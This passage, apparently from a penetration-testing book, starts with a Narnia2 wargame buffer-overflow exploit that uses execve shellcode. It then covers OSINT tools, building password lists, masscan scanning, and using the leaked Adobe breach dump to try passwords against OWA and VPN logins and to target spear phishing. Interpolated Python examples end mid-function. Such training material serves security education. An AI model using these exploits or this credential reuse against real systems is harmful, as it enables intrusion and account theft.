o esp 0xffffd640 0xffffd640 
o ebp 0x41414141 0x41414141 
o esi 0x0 0 
o edi 0x0 0 
o eip 0x42424242 0x42424242 


We were able to overwrite EIP with all "B" (or hex equivalent 0x42) characters. EIP is the pointer 
to the code that will be executed next by the processor (note that EBP was overwritten with our A's 
too, since the saved frame pointer sits just below the saved return address). If we can point EIP to an 
area of shellcode, we can compromise the system. Where might you find shellcode? You can always 
generate your own or you can grab shellcode from here: 

http://shell-storm.org/shellcode/ . 


In this example, we are going to use a Linux/x86 execve(/bin/sh) shellcode from that site. The one we 
end up running is 23 bytes long, and our payload needs to be 144 bytes in length (140 bytes up to EIP 
plus the 4-byte return address). I also want to change my A's to NOPs (0x90): if execution lands on a 
NOP, the CPU just continues to the next instruction until it reaches the shellcode. After playing 
around a little with the space (50 + 23 + 67 = 140), I created the following: 

• cd /narnia 

• gdb ./narnia2 -q 

• run `python -c 'print "\x90" * 50 + 
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80" 
+ "\x90" * 67 + "BBBB"'` 

o Starting program: /games/narnia/narnia2 `python -c 'print "\x90" * 50 + 
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80" 
+ "\x90" * 67 + "BBBB"'` 

o Program received signal SIGSEGV, Segmentation fault. 
o 0x42424242 in ??() 

• (gdb) info registers eip 

o eip 0x42424242 0x42424242 

We successfully have control of EIP with our shellcode and NOPs. Now, we need to just drop in 
anywhere before our NOPs and we should have a /bin/sh shell. To see what is stored in the memory, 
after we seg fault, type: 

• x/250x $esp 


Scrolling through, you should see something like the following: 


0xffffd780: 0x00000004 0x00000020 0x00000005 0x00000008 
0xffffd790: 0x00000007 0xf7fdc000 0x00000008 0x00000000 
0xffffd7a0: 0x00000009 0x08048360 0x0000000b 0x000036b2 
0xffffd7b0: 0x0000000c 0x000036b2 0x0000000d 0x000036b2 
0xffffd7c0: 0x0000000e 0x000036b2 0x00000017 0x00000000 
0xffffd7d0: 0x00000019 0xffffd7fb 0x0000001f 0xffffdfe2 
0xffffd7e0: 0x0000000f 0xffffd80b 0x00000000 0x00000000 
0xffffd7f0: 0x00000000 0x00000000 0x4a000000 0x4a448600 
0xffffd800: 0x1b1f07ce 0x2b6dbf8d 0x698c040a 0x00363836 
0xffffd810: 0x672f0000 0x73656d61 0x72616e2f 0x2f61696e 
0xffffd820: 0x6e72616e 0x00326169 0x90909090 0x90909090 
0xffffd830: 0x90909090 0x90909090 0x90909090 0x90909090 
0xffffd840: 0x90909090 0x90909090 0x90909090 0x90909090 
0xffffd850: 0x90909090 0x90909090 0xc0319090 0x2f2f6850 
0xffffd860: 0x2f686873 0x896e6962 0x895350e3 0xcd0bb0e1 
0xffffd870: 0x90909080 0x90909090 0x90909090 0x90909090 
0xffffd880: 0x90909090 0x90909090 0x90909090 0x90909090 
0xffffd890: 0x90909090 0x90909090 0x90909090 0x90909090 
0xffffd8a0: 0x90909090 0x90909090 0x90909090 0x90909090 
0xffffd8b0: 0x90909090 0x42424242 0x47445800 0x5345535f 
0xffffd8c0: 0x4e4f4953 0x3d44495f 0x36343832 0x48530034 
0xffffd8d0: 0x3d4c4c45 0x6e69622f 0x7361622f 0x45540068 
0xffffd8e0: 0x783d4d52 0x6d726574 0x3635322d 0x6f6c6f63 
0xffffd8f0: 0x53530072 0x4c435f48 0x544e4549 0x2e30373d 


NOP Sled 







We see our initial NOPs (x90), followed by our shellcode, more NOPs, and lastly, our BBBB. We 
need to change our BBBB to an address in our NOP Sled to execute our shellcode. An easy address is 
0xffffd850—a stack address which points to our first set of NOPs. Let’s give it a try and don’t forget 
Little Endian. 


• (gdb) run `python -c 'print "\x90" * 50 + 
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80" 
+ "\x90" * 67 + "\x50\xd8\xff\xff"'` 

o Starting program: /games/narnia/narnia2 `python -c 'print "\x90" * 50 + 
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80" 
+ "\x90" * 67 + "\x50\xd8\xff\xff"'` 
o process 5823 is executing new program: /bin/dash 

• $ cat /etc/narnia_pass/narnia3 

o cat: /etc/narnia_pass/narnia3: Permission denied 


We were able to get our shellcode to execute and spawn a shell, but for some reason we 
couldn’t read the narnia3 password. Let’s try this outside of GDB: 

• narnia2@melinda:/narnia$ ./narnia2 `python -c 'print "\x90" * 50 + 
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80" 
+ "\x90" * 67 + "\x50\xd8\xff\xff"'` 

• $ cat /etc/narnia_pass/narnia3 

o [Answer to Narnia3 Here] 


Narnia 2 - Exploit 


And there it works! We now have a privileged shell and can read the password for narnia3. 
Hopefully, this gives you an initial insight into how buffer overflows work and why they work. 
Remember that this was a quick 1000-foot view of binary exploitation. It is now up to you to spend 
some time trying some of the other examples. 


Summary 


What this chapter has tried to do is to help you build a standard platform for testing, make sure you 
have a strong foundation of PowerShell, and give you an understanding of the basics of binary 
exploitation. 


Tools will always change, so it is important to keep your testing platforms up-to-date and patched. I 
have included all the tools that are used in this book and, hopefully, this information will be enough to 
get you started. If you feel that I am missing any critical tools, feel free to leave comments at: 

http://www.thehackerplaybook.com 

Take a full clean snapshot of your working VMs and let’s start discovering and attacking networks. 



Before The Snap - Scanning The Network 


The game has started and you walk onto the SUCK, Inc. field. Before the first kickoff, and before we 
even attack our unsuspecting victim, we need to analyze our opponent. Studying the target for 
weaknesses and understanding the environment will provide huge payoffs. This chapter will take a 
look at scanning from a slightly different aspect than the normal penetration testing books and should 
be seen as an additive to your current scanning processes, not as a replacement. 

Whether you are a seasoned penetration tester or just starting in the game, scanning has probably been 
discussed over and over again. I am not going to compare in detail all the different network scanners, 
vulnerability scanners, SNMP scanners and so on, but I will try to give you my most efficient process 
for scanning. This section will be broken down into Open Source Intelligence, External Scanning, 
Internal Scanning, and Web Application Scanning. 


Passive Discovery - Open Source Intelligence (OSINT) 


Trained in Open Source Intelligence, you use your knowledge of where information exists on the 
Internet to find as much information about SUCK as we can. We want to become one with these Cyber 
Kittens, find their secrets, understand their verbiage, and find their employees. 

Before you ever even start performing any OSINT tests, it is best if you create fake social media 
accounts. Some examples of these might be (the more you have the better): 

• LinkedIn 

• Twitter 

• Google+ 

• Facebook 

• Instagram 

• MySpace 

• Glassdoor 

You don’t want to use your own personal accounts as many of the sites show who visited your pages. 
This could be a quick way to get identified and potentially kill your whole mission. Now that we are 
ready with the OSINT setup, let’s start gathering data. 


We will start with Passive Discovery, which will search for information about the target, network, 
clients, and more without ever touching the targeted host. This is great because it uses resources on 
the Internet without ever alerting the target of any suspicious activity. You can also run all these 
lookups prior to an engagement to save you an immense amount of time. Let’s start reviewing some 
sources and tools for OSINT. 


Recon-NG 



(https://bitbucket.org/LaNMaSteR53/recon-ng) (Kali Linux) 


Recon-NG is a great tool for querying Open Source Intelligence (OSINT) for passive information 
about a company. This should be one of the first places you start before you pentest any organization. 
It can give you a lot of information about IP space, naming conventions, locations, users, email 
addresses, possible password leaks, and more. 



Recon-ng 


Prerequisites 

There are some modules like LinkedIn or Jigsaw that provide great value, but you do need to get API 
keys for those. I will walk you through one API key example, which is free and easy to use. 

To use the ipinfodb database to find the exact location of all the IPs you identify, you need to get an 
API key. Go to: http://ipinfodb.com/register.php and register for a key. We will add the key to our 
local store database during our next example. 

To run Recon-ng: 


• cd /opt/recon-ng 

• ./recon-ng 

• workspaces add [Company Name - example SUCK Company] 

• add domains [DOMAIN - example suck.testlab] 

• add companies 

• use recon/domains-hosts/bing_domain_web 
o Look through Bing for domain names 

• run 

• use recon/domains-hosts/google_site_web 
o Look through Google for domain names 

• run 

• use recon/domains-hosts/baidu_site 
o Look through Baidu (Chinese Search Engine) for domain names 

• run 

• use recon/domains-hosts/brute_hosts 
o Brute-force subdomains 

• run 

• use recon/domains-hosts/netcraft 
o Look at Netcraft for domain names 

• run 

• use recon/hosts-hosts/resolve 
o Resolve all the domain names to IP 

• run 

• use recon/hosts-hosts/reverse_resolve 
o Resolve all the IPs to hostnames/domain names 

• run 

• use discovery/info_disclosure/interesting_files 
o Look for a few files on the identified domains 

• run 

• keys add ipinfodb_api [KEY] 
o This is where you add your ipinfodb API key from earlier 

• use recon/hosts-hosts/ipinfodb 
o Find the location of the IPs that were discovered 

• run 

• use recon/domains-contacts/whois_pocs 
o Find email addresses from the whois lookup 

• run 

• use recon/domains-contacts/pgp_search 
o Look through the public PGP store for email addresses 

• run 

• use recon/contacts-credentials/hibp_paste 
o This will check all of the email accounts you have gathered against 
the “Have I Been Pwned” website. This will let you know if there 
are potentially leaked passwords that you might be able to use. 

• run 

• use reporting/html 
o Create a report 

• set CREATOR HP2 

• set CUSTOMER HP2 

• run 

• exit 

• firefox /root/.recon-ng/workspaces/SUCK_Company/results.html 



This will create a report of all the findings in one single web page. Let’s take a look at what type of 
valuable data has been gathered: 


Recon-ng Report 


From the results above, we can see that we have been able to quickly identify a ton of different 
hostnames, IPs, locations, email addresses, and more. This is a great start for getting some 
reconnaissance on our victim. Let’s keep gathering data! 


Discover Scripts 

(https://github.com/leebaird/discover) (Kali Linux) 


Discover scripts by Lee Baird is still one of my favorite passive discovery tools because of the ease 
of use and the amount of data gathered. Using a passive recon scan, Discover will use tools such as: 
dnsrecon, goofile, goog-mail, goohost, theharvester, metasploit, urlcrazy, whois, dnssy, ewhois, 
myipneighbors, and urlvoid. Discover is updated often and is a great tool for performing OSINT. 

RECON 
1. Domain 
2. Person 
3. Parse salesforce 

SCANNING 
4. Generate target list 
5. CIDR 
6. List 
7. IP, Range or URL 

WEB 
8. Open multiple tabs in Iceweasel 
9. Nikto 
10. SSL 

MISC 
11. Crack WiFi 
12. Parse XML 
13. Start a Metasploit listener 
14. Update 
15. Exit 

Choice: 


Discover Script 


• cd /opt/discover 

• ./discover.sh 

o 1. Domain 
o 1. Passive 
o [Company Name] 
o [Domain Name] 

o firefox /root/data/[Domain]/index.htm 


The results include information about email addresses, names of employees, and hosts. 




Reports: Passive Recon - Summary: Emails 18, Names 87, Hosts 9, Squatting 48, Subdomains 32, Text 1 
(followed by the full lists of email addresses at suck.testlab and employee names). 


Discover Report 


Some of the more interesting findings are those such as squatting and bitflipping. Discover shows us 
which squatting domains have been purchased and which are currently free. In an engagement, a 
doppelganger domain could prove extremely valuable for phishing, trust, or compromising victims. 
Reports: Passive Recon - Squatting (48): for each squat type (Character Omission, Character Repeat, 
Character Swap, Double Character Replacement, Missing Dot) the report lists the look-alike domain 
(for example sue.testlab, suckk.testlab, succk.testlab, wwwsuck.testlab), its IP address and country; 
Subdomains (32): each discovered subdomain (about, apidoc, blog, and so on) with its IP address. 


Discover Domain Information 


Spiderfoot 

(http://www.spiderfoot.net/) (Kali Linux) 


One last tool I like to use for OSINT is SpiderFoot. SpiderFoot, written by Steve Micallef, is a quick 
little tool that performs a ton of different OSINT recon. Every tool queries the data slightly differently 
and presents it in different fashions. Thus, it helps to have multiple tools to gather OSINT data to 
compile a good view of the victim company. 


Running SpiderFoot: 

• cd /opt/spiderfoot/spiderfoot* 

• python ./sf.py 

• open up a browser and go to http://127.0.0.1:5001/ 









SpiderFoot v2.3 - New Scan: Scan Name SUCK, Seed Target, with the data to collect selectable By 
Required Data or By Module (Affiliate - IP Address, BGP AS Membership, Blacklisted IP Address, 
Co-Hosted Site, Cookies, DNS TXT Record, Defaced, Device Type, and more). 


SpiderFoot 


What type of information is collected? Everything from blacklists to IPv6 addresses to Co-Hosted 
Sites to E-mail addresses. As you know, every tool is maintained differently and there are many times 
where one tool will find different information compared to another tool. What is good about 
SpiderFoot is that it is quick, very easy, and comes back with a ton (I mean a ton) of great OSINT 
information. I ran a quick scan for a site and within seconds, I found loads of information on a domain 
or IP. 














SpiderFoot scan results: Total 206, Unique 167, Status RUNNING. 


SpiderFoot Report 


With these three sources, we should have a good idea of our victim’s open source intelligence. This 
data will become very valuable later, so make sure you review all the data thoroughly. 


Creating Password Lists: 


From the OSINT searches, we have learned a great deal about SUCK and their organization. The next 
step is to find more targeted information about the company, the people, the location, and their 
customers by developing more customized password lists. We have all used large password lists in 
the past and specifically in THP1, but we are looking to crack that 70%+ rate. To achieve this, we 
need to create custom and smart word lists based on our victim companies and related industries. 


In the last book, we used the crackstation list, which we will definitely use again, but after having a 
great password base, you need to also build a list of custom passwords. 


Wordhound 

(https://bitbucket.org/mattinfosec/wordhound.git) (Kali Linux) 


Wordhound is a tool that creates word lists and dictionaries based on Twitter searches, PDF 
documents, and even Reddit sub-reddits. So to target our victim company, we can grab all the results 
from their tweets and even words that might be associated with the company. {1} 


Wordhound didn’t run right off the bat in Kali Linux at the time of writing this book, so I had to do a 
few modifications: 

• git clone https://bitbucket.org/mattinfosec/wordhound.git /opt/wordhound/ 

• apt-get install python-setuptools 

• cd /opt/wordhound && python setup.py install && ./setup.sh 








I had some issues with tweepy, so I had to manually git clone it and re-download it: 

• manually install tweepy 

o pip install -U pip 

o git clone https://github.com/tweepy/tweepy.git /opt/tweepy/ 
o cd /opt/tweepy 
o python ./setup.py install 
o /usr/local/bin/pip install requests[security] 
o service ntp restart 

Once you get everything working, we need to edit the configuration file: 

• cd /opt/wordhound && gedit wordhound.conf.dist 

• Input the relevant information such as your twitter API key if you want to use twitter. 
If you don’t currently have a Twitter API key, you can get one from here: 
https://apps.twitter.com/app/new . Once you get your key, write down your: 

o Consumer Key (API Key) 
o Consumer Secret (API Secret) 
o Access Token 
o Access Token Secret 

• cp wordhound.conf.dist wordhound.conf 

After adding these to your wordhound.conf.dist file, save or move that copy to wordhound.conf. That 
is really the only initial configuration you will need to get this all working. For our first run, we are 
going to first generate a dictionary from a website. This will scrape the webpage and make a unique 
list of words to use for our password list. 


To start Wordhound: 

• cd /opt/wordhound 

• python Main.py 

• 1. Generate Dictionary 

• 3. Create new industry 

o Enter industry: SUCK 

• 1. Generate Dictionary 

• 1. SUCK 

• 1. Create new client 

o SUCK 

• 1. Generate Dictionary from website. 

o http://www.securepla.net 

• How many levels: 3 

• gedit "data/industries/Hacker Playbook/Hacker Playbook/WebsiteDictionary.txt" 






WebsiteDictionary.txt contents (sample entries: bypassuac, pentestgeek, hacker, mimikatz_trunk, 
smbexec, mimikatz, cookie, trustedsec, scans, vulnerabilities, laterally, pentesting, playbook, 
peepingtom, lateral, crackstation, hackers). 


Wordhound - Web Results 


Now, with a good list from websites, we need other sources of data to append to that list. One great 
source of valuable data is Twitter. Twitter usually includes very relevant data based on specific 
searching. We can use Wordhound to go through Twitter on a specific word or words and grab all the 
unique words from it. Let’s run this by choosing: 


• 4. Generate Dictionary from twitter search term. 

o Search Term: hacking 

• gedit data/industries/Hacker\ Playbook/Hacker\ Playbook/TwitterSearchTermDictionary.txt 


== CLIENT OPTIONS == 

[+] Please choose an option: 
1. Generate Dictionary from website. 
2. Generate Dictionary from Text file. 
3. Generate Dictionary from pdf. 
4. Generate Dictionary from twitter search term. 
5. Generate Dictionary from Reddit 
6. Generate aggregate client dictionary. 
4 

[-] Please enter the search term: 
hacking 

How many tweets would you like to analyse?:(Default = 700) (Max = 700) 
700 

[+] Querying twitter for hacking 
[-] Authorizing twitter API 
[-] Twitter auth successful 
[-] Retrieving search data 
[-] Downloaded 100 tweets 
[-] Downloaded 200 tweets 
[-] Downloaded 300 tweets 


Wordhound - Twitter 


Wordhound - Twitter Results 


Another favorite source of data is from Reddit. This is where you get creative. You need to find the 
right sub-reddits that represent your company or industry. You can try a multitude of different sub- 
reddits to find out which best suit your engagement. 


Since our target in this case is a security company, we can parse one of my favorite sub-reddits: 
/r/netsec. Let’s see what types of unique words we can identify: 


• 5. Generate Dictionary from Reddit 
o netsec 









RedditDictionary.txt contents (sample entries: opsec, block cipher, blockcipher, memory dump, 
memorydump, north korea, northkorea). 


Wordhound - Reddit 


We can see from /r/netsec that we have a lot of new words to add to our potential password list that 
we might not have caught with the other lists. Target different subreddits for the industry, the 
city the company belongs to, the company itself, and so on. 


Brutescrape 

(https://github.com/cheetz/brutescrape) (Kali Linux) 


I had problems getting Wordhound to parse webpages properly, so until it is fixed, I created a quick 
python script to scrape pages and provide unique results. BruteScrape is a tool that reads the source 
of any webpage, parses out all the HTML tags, cleans up the results, and uniques them. This is a great 
quick tool to build password lists from a bulk import of websites. 


• cd /opt/brutescrape/ 

• gedit sites.scrape and put in the websites you want to scrape 

• results are stored to passwordList.txt 







Brute Scrape 


The customized passwords gained from BruteScrape and Wordhound, combined with the large 
common password lists, give us a great start to crack and brute-force accounts. 
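As an added example (not BruteScrape's or Wordhound's own code), the stdlib-only script below does what the text describes: reads a page's source, drops the HTML tags plus script and style contents, and returns the unique words, then appends further sources (Twitter, Reddit) without duplicates. SAMPLE_HTML is a constructed page, not real site content; a defender can run the same thing against their own site to see which company terms a password audit should cover.

```python
"""Build a candidate word list from web page source (added example)."""
from html.parser import HTMLParser
import re

# Constructed sample page standing in for a site listed in sites.scrape.
SAMPLE_HTML = """<html><head><title>SUCK Cyber Kittens</title>
<style>.hero { color: red; }</style></head>
<body><h1>Welcome to SUCK, Inc.</h1>
<p>Our Cyber Kittens team ships the Playbook platform. Contact support@suck.testlab.</p>
<script>var apiKey = "secret";</script>
</body></html>"""


class _VisibleText(HTMLParser):
    """Collect only the text a visitor would see; skip <script> and <style> bodies."""

    def __init__(self):
        super().__init__()
        self.chunks = []
        self._skip_depth = 0

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip_depth += 1

    def handle_endtag(self, tag):
        if tag in ("script", "style") and self._skip_depth:
            self._skip_depth -= 1

    def handle_data(self, data):
        if not self._skip_depth:
            self.chunks.append(data)


def scrape_words(html: str, min_len: int = 4) -> list:
    """Return unique lowercase words (letters/digits, >= min_len chars) in first-seen order."""
    parser = _VisibleText()
    parser.feed(html)
    text = " ".join(parser.chunks)
    seen = set()
    words = []
    for word in re.findall(r"[A-Za-z0-9]{%d,}" % min_len, text):
        lowered = word.lower()
        if lowered not in seen:          # "uniques" the results as the text puts it
            seen.add(lowered)
            words.append(lowered)
    return words


def merge_wordlists(*lists) -> list:
    """Append lists from other sources (Twitter, Reddit) keeping order, no duplicates."""
    seen = set()
    merged = []
    for source in lists:
        for word in source:
            if word not in seen:
                seen.add(word)
                merged.append(word)
    return merged


if __name__ == "__main__":
    site_words = scrape_words(SAMPLE_HTML)
    print(site_words)  # script/style contents such as "secret" never appear
    print(merge_wordlists(site_words, ["opsec", "playbook", "netsec"]))
```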


Using Compromised Lists To Find Email Addresses And Credentials 


The great thing about being a penetration tester is that you have to get creative and use all sorts of 
resources, just as if someone was malicious. One tactic that I have found to be very fruitful in the past 
is using known credential dumps for password reuse. Let me explain a little more in detail. 


There was a large breach of Adobe's systems. The compromised information consisted of email 
addresses, encrypted passwords, and their password hints. {2} The large dump, which was almost 10 
Gigabytes, was released privately in small circles and is now publicly available (try searching for 
Adobe and users.tar.gz). From an attacker's perspective this is a gold mine of information. What I 
generally do is parse through this file and identify the domains against which I am doing a test. 


Of course, it is important to see if this type of testing is in the scope of your engagement and that you 
aren't breaking any laws by obtaining a copy of any password/compromised lists. If it is a full black 
box test, this should definitely be a part of your attacking approach. 


For example, in the image below, I will search (using the Linux grep command: grep "@yahoo.com" 
cred > hashlist.txt) through the Adobe password list for a sample domain of yahoo.com and write that 
to a file named hashlist.txt (remember you should search for the domain for which you are testing). 
We can see that there are many users (which I redacted) with an email address containing yahoo that 
have an encrypted password and password hint. 


List of Accounts/Passwords from Adobe Breach 2013 


Based on the hints, you could do some research and find out who a specific user's boyfriend is or the 
name of their cat, but I usually go for the quick and dirty attempt. I was able to find two groups of 
researchers who, based on patterns and hints, were able to reverse some of the encrypted passwords. 
Remember that from the Adobe list, since the passwords aren't hashes but encrypted passwords, 
trying to reverse the passwords is much more difficult without the key. The two reversed lists I was 
able to identify are: 

• http://stricture-group.com/files/adobe-top100.txt 

• http://web.mit.edu/zyan/Public/adobe_sanitized_passwords_with_bad_hints.txt (no 
longer available) 


I combined both these lists, cleaned them, and hosted them on my Github: 

• https://github.com/cheetz/adobe_password_checker/blob/master/foundpw.csv 









Taking this list, I put together a short python script that parses through a list of email/encrypted 
passwords and compares that against the foundpw.csv file. Let’s pull this code onto your Kali Linux 
host: 

• git clone https://github.com/cheetz/adobe_password_checker /opt/adobe_password_checker 

• cd /opt/adobe_password_checker/ 

The password_check.py python script will find any password matches between the hashlist.txt file 
you created and the foundpw.csv file, which contains known passwords. When a match is found, the 
script will return a list of email addresses and the reversed passwords. Of course, the two research 
groups do not have a large number of the passwords reversed, but it should contain the low-hanging 
fruit. Let's see this in action: 

• Make sure to copy your hashlist.txt file to /opt/adobe_password_checker/ 

• python password_check.py 


root@kali:/opt/adobe_password_checker# python password_check.py 
Matches[+]: <redacted>@yahoo.com : <encrypted password> , if your a hacker my password is january 
(one Matches[+] line per account, with its email address, encrypted password and hint) 


Custom Python Script to Look for Email/Passwords 


I will usually take the results from this output and try the usernames/passwords against the company's 
Outlook Web Access (OWA) logins or against VPN logins. You may need to play around with some 
of the variables on the passwords (i.e. if they have 2012, you might want to try 2015) and also make 
sure you don't lock out accounts. 


I then take the email addresses gathered from these findings and use them in spear phishing 
campaigns. Remember, if they are on the Adobe list, there is a good chance that these users are in the 
IT group. Owning one of these accounts could be extremely beneficial. 


This is why penetration testing is so much fun. You really can't just run tools-you have to use your 
own creativity to give your customer the best and most real-world types of attacks they might receive. 
Don’t forget to keep checking Pastebin type sites, password dump sites, and Bittorrent files for 
password leaks. 


Gitrob - Github Analysis 

(https://github.com/michenriksen/gitrob) (Kali Linux) 


In today’s world, the “information gathering game” is changing ever so rapidly. If your client is a 
large client, chances are many of the developers are also on Github. This is where Gitrob comes into 
play. Michael Henriksen developed a tool to search through Github for a customer and any potentially 
sensitive files. These files can include secret HTTP endpoints, session IDs, user information, 
passwords and API keys. 

In terms of OSINT, these sources are great for gathering emails, learning about what the potential 
company might be developing, default passwords, possible API keys, and more. 

Configuring Gitrob: 

• cd /opt/gitrob/bin 

• ./gitrob --configure 

• user: gitrob 

• password: from what you configured during the installation 

• To access Github via this API, we need to first get an Access Token: 

o Create/Login to Github Account 
o Go to Settings -> Applications 
o Generate Token 

• Enter the Token into Gitrob 
Gitrob search 


To start a Gitrob search: 

• gitrob -o <orgname> 


In our example below, we will test this against the org name of reddit. 






/opt/gitrob/bin# gitrob -o reddit 

By @michenriksen 

[*] Starting Gitrob version 0.0.3 at 2015-01-15 04:09 EST 

[*] Loading configuration.. . done 

[*] Preparing SQL database... done 

[*] Loading file patterns... done 

[*] Collecting organization repositories... done 

[*] Collecting organization members... done 

[*] Collecting member repositories... 

[>] Collected 6 repositories from atiaxi 

[>] Collected 14 repositories from ajacksified 

[>] Collected 5 repositories from alienth 

[>] Collected 3 repositories from bsimpson63 

[>] Collected 16 repositories from btholt 

[>] Collected 5 repositories from Deimos 

[>] Collected 9 repositories from JordanMilne 

[>] Collected 7 repositories from mtitolo 

[>] Collected 1 repository from rrain 

[>] Collected 15 repositories from spladug 

[>] Collected 6 repositories from umbrae 

[>] Collected 27 repositories from xiongchiamiov 

[>] Collected 6 repositories from zeantsoi 

[*] Processing repositories... 

[>] Processed 75 files from reddit/reddit-i18n with no findings 
[>] Processed 128 files from reddit/iReddit with no findings 
[>] Processed 28 files from reddit/snudown with no findings 
[>] Processed 19 files from reddit/monitors with no findings 
[>] Processed 20 files from reddit/error-pages with no findings 
[>] Processed 20 files from reddit/push with no findings 


Gitrob - Running 


Once the scan is complete, open a browser and go to http://127.0.0.1:9393/. You will see three tabs. 
The first tab is the findings. These might contain information such as references to secret HTTP 
endpoints, session IDs, user information, passwords and API keys. 



Gitrob - Findings 


The second tab shows all the users it was able to grab, along with associated repositories. 

















OSINT Data Collection 


Collecting and studying a company passively is one of the most important factors in a successful 
penetration test. This allows us to gain a wealth of data without ever triggering a single IDS alert. 


We should now have enough information about the company, the industry, and possible user 
passwords. The best part is that we found all this data passively. Let’s move on to scanning and 
active discovery. 


External/Internal Active Discovery 


Active discovery is the process of trying to identify systems, services, and potential vulnerabilities. 
We are going to target the network ranges specified in scope and scan them. Whether you are scanning 
from the internal or the external segments of the network, it is important to have the right tools to 
perform active discovery. 


I want to emphasize that this book is not going to discuss in detail how to run a scanner, as you should 
already be familiar with that. If you aren’t, then I recommend that you download the community 
edition of Nexpose or get a trial version of Nessus. Try running them in a home network or even in a 
lab network to get an idea of the types of findings, how to use authenticated scans, and the type of 
traffic generated on a network. These scanners will trigger IDS/IPS alerts on a network very 
frequently as they are extremely loud. Now that we are ready, let’s get into some of the finer details 
here. 


In this section, I describe the process that I like to use when scanning a network. I will use multiple 
tools, processes, and techniques to try and provide efficient and effective scanning. My scanning 
processes will look something like this: 


• Scanning with Masscan 

• Scanning with Sparta 

• Scanning with HTTP Screenshot 

• Scanning with Eyewitness/WMAP 

• Scanning using Nexpose/Nessus/OpenVAS 

• Scanning with Burp Proxy Pro 

• Scanning with ZAP Proxy 

• Parsing Output 

Masscan 

(https://github.com/robertdavidgraham/masscan) (Kali Linux) 


Once you start active scanning, there are many tools to use. Historically, we have all used nmap to 
map out IPs/Ports, but the game has been changing. Large ranges are a pain to scan, but this is where 
Masscan comes into play. Similar to nmap (it even has similar flags), Masscan uses its own custom 
TCP/IP stack for speed and efficiency. Let’s see how we would kick off a Masscan scan. 

Running Masscan: 

• cd /opt/masscan/bin/ 

• ./masscan -p80,8000-8100 10.0.0.0/8 

• ./masscan -p0-65535 --rate 150000 -oL output.txt 

o -p defines the ports to be scanned 
o --rate defines packets-per-second 

■ Be careful with this setting. Make sure your VPS, the servers you are scanning, 
and the system/network from which you run Masscan can support the amount of traffic 
o -oL defines the list output file to write to 


For example, I ran some test scans from a VPS server: 

hp2:/opt/masscan/bin$ ./masscan -p0-65535 23.239.151.0/24 --rate 150000 -oL output.txt 

Starting masscan 1.0.3 (http://bit.ly/14GZzcT) at 2015-02-02 05:46:10 GMT 
--forced options: -sS -Pn -n --randomize-hosts -v --send-eth 
Initiating SYN Stealth Scan 
Scanning 256 hosts [65536 ports/host] 

hp2:/opt/masscan/bin$ date 
Mon Feb 2 05:48:23 UTC 2015 

From the test scan above, we are looking at about two minutes for the configuration and system 
on which we are testing. Luckily, my VPS has a very large network connection and can support a high 
rate of packets per second. 

Running nmap with similar settings: 

hp2:/opt/masscan/bin$ nmap -v -PN -n -sT -T5 23.239.151.0/24 -p0-65535 -oN output_nmap.txt 

Starting Nmap 6.47SVN ( http://nmap.org ) at 2015-02-02 05:53 UTC 
Initiating Connect Scan at 05:53 
Scanning 64 hosts [65536 ports/host] 
Discovered open port 80/tcp on 23.239.151.23 
Stats: 0:00:22 elapsed; 0 hosts completed (64 up), 64 undergoing Connect Scan 
Connect Scan Timing: About 1.18% done; ETC: 06:26 (0:32:11 remaining) 


From the in-progress results above, we can see the scan will take well over 30 minutes (as it is 
scanning 64 hosts at a time). 


Masscan improves scanning significantly and allows a tester to scan and have results in minimal time. 
One feature that really helps you configure your Masscan scans is the use of the --echo switch. The 
example below writes a sample scan to a file. Reading that file configures all the different settings 
that the scan will use. Once all the settings are correct, a scan can be kicked off with a “-c” flag. 

• hp2:/opt/masscan/bin# ./masscan -p0-65535 23.239.151.0/24 --rate 150000 -oL output.txt --echo > scan.conf 

• hp2:/opt/masscan/bin# cat scan.conf 
rate = 150000.00 
randomize-hosts = true 
seed = 14393045175689752532 
shard = 1/1 

# ADAPTER SETTINGS 
adapter-ip = 0.0.0.0 

# OUTPUT/REPORTING SETTINGS 
output-format = list 
show = open,, 
output-filename = output.txt 
rotate = 0 

# TARGET SELECTION (IP, PORTS, EXCLUDES) 
ports = 0-65535 
range = 23.239.151.0/24 

• hp2:/opt/masscan/bin# ./masscan -c scan.conf 

We can save this template and use it for all future scans or have a list of templates for specific types 
of scans. 
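The list output (-oL) produced by the scans above is what the later steps in this chapter consume, so here is an added example of parsing it. This is written for this edit and is not code from the book or from the masscan project. The sample records are constructed in masscan's list format (state, protocol, port, IP, Unix timestamp) and the web-port set mirrors the one the HTTP Screenshot section configures in masshttp.sh:

```python
import ipaddress
from collections import Counter, defaultdict

# Constructed sample of masscan list output (-oL). One record per line:
# <state> <proto> <port> <ip> <unix timestamp>, framed by '#masscan' / '# end'.
SAMPLE_MASSCAN_LIST = """\
#masscan
open tcp 80 23.239.151.23 1422855970
open tcp 443 23.239.151.23 1422855971
open tcp 22 23.239.151.40 1422855972
open tcp 8080 23.239.151.40 1422855972
open tcp 8443 23.239.151.40 1422855973
open tcp 80 23.239.151.77 1422855974
open tcp 9200 23.239.151.77 1422855974
# end
"""

# Web ports the HTTP Screenshot section of this chapter configures in masshttp.sh.
WEB_PORTS = {80, 443, 8000, 8001, 8080, 8443, 8008, 9200, 50070}


def parse_masscan_list(text):
    """Return {ip: {(proto, port), ...}} built from the 'open' records.

    Comment lines are skipped; non-'open' records (for example 'banner' lines
    when --banners is used) are ignored. A short or malformed record raises so a
    truncated output file is noticed instead of quietly shrinking the host list.
    """
    hosts = defaultdict(set)
    for lineno, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        if fields[0] != "open":
            continue
        if len(fields) < 5:
            raise ValueError(f"line {lineno}: expected 5 fields, got {len(fields)}")
        _state, proto, port, ip, _ts = fields[:5]
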